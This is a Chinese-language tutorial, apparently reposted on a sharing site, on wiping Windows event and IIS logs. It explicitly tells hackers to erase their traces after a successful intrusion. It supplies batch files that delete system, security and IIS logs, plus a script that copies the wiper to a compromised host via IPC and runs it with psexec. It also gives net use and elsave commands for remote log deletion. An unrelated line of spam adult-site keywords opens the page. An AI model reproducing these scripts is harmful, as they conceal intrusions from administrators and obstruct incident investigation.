九色国产,午夜在线视频,新黄色网址,九九色综合,天天做夜夜做久久做狠狠,天天躁夜夜躁狠狠躁2021a,久久不卡一区二区三区

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP
巧妙清除本地和遠(yuǎn)程日志文件
      什么是日志文件?它是一些文件系統(tǒng)集合,依靠建立起的各種數(shù)據(jù)的日志文件而存在。在任何系統(tǒng)發(fā)生崩潰或需要重新啟動時,數(shù)據(jù)就遵從日志文件中的信息記錄原封不動進(jìn)行恢復(fù)。日志對于系統(tǒng)安全的作用是顯而易見的,無論是網(wǎng)絡(luò)管理員還是 黑客都非常重視日志,一個有經(jīng)驗(yàn)的管理員往往能夠迅速通過日志了解到系統(tǒng)的安全性能,而一個聰明的黑客會在入侵成功后迅速清除掉對自己不利的日志。無論是攻還是防,日志的重要性由此可見。下面我們就來簡單討論一下日志文件的清除方法。
  一、日志文件的位置
  Windows 2000的系統(tǒng)日志文件有應(yīng)用程序日志,安全日志、系統(tǒng)日志、DNS服務(wù)器日志等等,應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS日志默認(rèn)位置:%systemroot%\system32\config。
  安全日志文件:%systemroot%\system32\config\SecEvent.EVT
  系統(tǒng)日志文件:%systemroot%\system32\config\SysEvent.EVT
  應(yīng)用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
  有的管理員很可能將這些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目錄。
  二、清除自己電腦中的日志
如果你要清除自己電腦中的日志,可以用管理員的身份來登錄Windows,然后在“控制面板”中進(jìn)入“管理工具”,再雙擊里面的“事件查看器”。打開后我們就可以在這里清除日志文件了,里面有應(yīng)用程序、安全和系統(tǒng)日志文件。舉個例子,比方說你想清除安全日志,可以右鍵點(diǎn)擊“安全日志”,在彈出的菜單中選擇“屬性”(圖1)。接下來在彈出的對話框中,點(diǎn)擊下面“清除日志”按鈕就可以清除了(圖2),如果你想以后再來清除這些日志的話,可以將“按需要改寫尺寸”,這樣就可以在達(dá)到最大日志尺寸時進(jìn)行改寫事件了,不會提示你清除日志。


圖 1

三、清除遠(yuǎn)程主機(jī)上的日志

 

  大多數(shù)情況下,IIS的日志會忠實(shí)地記錄它接收到的任何請求(也有特殊的不被IIS記錄的攻擊),一個優(yōu)秀的系統(tǒng)管理員會利用這點(diǎn)來發(fā)現(xiàn)入侵的企圖,保護(hù)自己的系統(tǒng)。所以如果你是黑客,入侵系統(tǒng)成功后第一件事便是清除日志,擦去自己的形跡,這時可以用以下兩個辦法:一是自己編寫批處理文件來解決,編寫一個能清除日志的批處理非常簡單,方法是:新建一個具有如下內(nèi)容的批處理文件:

  @del c:\winnt\system32\logfiles\*.*
  @del c:\winnt\system32\config\*.evt
  @del c:\winnt\system32\dtclog\*.*
  @del c:\winnt\system32\*.log
  @del c:\winnt\system32\*.txt
  @del c:\winnt\*.txt
  @del c:\winnt\*.log
  @del c:\del.bat

  把上面的內(nèi)容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執(zhí)行時本行在命令行或DOS里面不顯示,另外del命令大家一定清楚吧?它是刪除文件命令。

  接下來再新建一個批處理文件,內(nèi)容如下:

  @copy del.bat \\%1\c$
  @echo 向肉雞復(fù)制本機(jī)的del.bat……OK
  @psexec \\%1 c:\del.bat
  @echo 在肉雞上運(yùn)行del.bat,清除日志文件……OK

  保存為clean.bat即可,假設(shè)已經(jīng)與肉雞進(jìn)行了IPC連接,然后在CMD下輸入:clean.bat 肉雞IP,即可清除肉雞上的日志文件。

  清除日志的另外一個方法是借助第三方軟件,如著名黑客軟件流光的開發(fā)者黑客小榕的elsave.exe,就是是一款可以遠(yuǎn)程清除系統(tǒng)日志、應(yīng)用程序日志、安全日志的軟件,大家可以在網(wǎng)上下載到。elsave.exe使用起來很簡單,首先利用獲得的管理員賬號與對方建立IPC會話:net use \\ip pass /user: user,然后在命令行下執(zhí)行如下命令:elsave -s \\ip -l application -C,這樣就刪除了安全日志。

本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點(diǎn)擊舉報
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
網(wǎng)管和黑客都必須知道的命令
讓病毒無處藏身--讓Temp文件夾里的文件自動清空
修改系統(tǒng)日志路徑 保障記錄安全
一個bat文件輕松刪除0字節(jié)的無效文件
電腦“無法刪除文件:無法讀源文件或磁盤”的解決方案
看看你的愛機(jī)是不是正被別人控制
更多類似文章 >>
生活服務(wù)
熱點(diǎn)新聞
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服